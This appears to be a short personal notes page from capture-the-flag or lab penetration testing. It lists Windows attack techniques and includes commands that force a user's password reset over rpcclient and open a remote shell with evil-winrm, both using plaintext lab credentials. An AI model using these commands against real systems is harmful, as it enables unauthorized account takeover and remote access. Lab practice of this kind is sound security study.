Temp - Notes

Exploiting GPP SYSVOL - cname password / Groups.xml

Setting up network between Vbox and VMware

Check Recycle bin

you need the SID for the user that you want to check the recycle bin for.

cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'

Change password for user over rcpclient

Output should be nothing.
rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "alien##123"'

EVIL-WINRM for ATHNEA

👾]/home/ali3nw3rx $ sudo docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

runAS

Chisel

Juicy PotatoNG

Windows path traversal cheet sheat

Last updated